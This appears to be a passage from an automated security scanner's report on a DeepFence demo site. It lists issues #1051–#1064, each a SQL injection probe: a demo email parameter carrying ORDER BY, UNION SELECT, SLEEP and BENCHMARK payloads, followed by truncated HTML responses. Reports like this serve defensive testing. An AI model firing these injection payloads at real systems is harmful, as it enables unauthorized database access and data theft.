CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1051\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1052\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT NULL#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1053\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1054\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1055\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1056\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1057\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1058\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \") or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #1059\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1060\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1061\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io or benchmark(50000000,MD5(1))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1062\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1063\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 31337#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1064\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 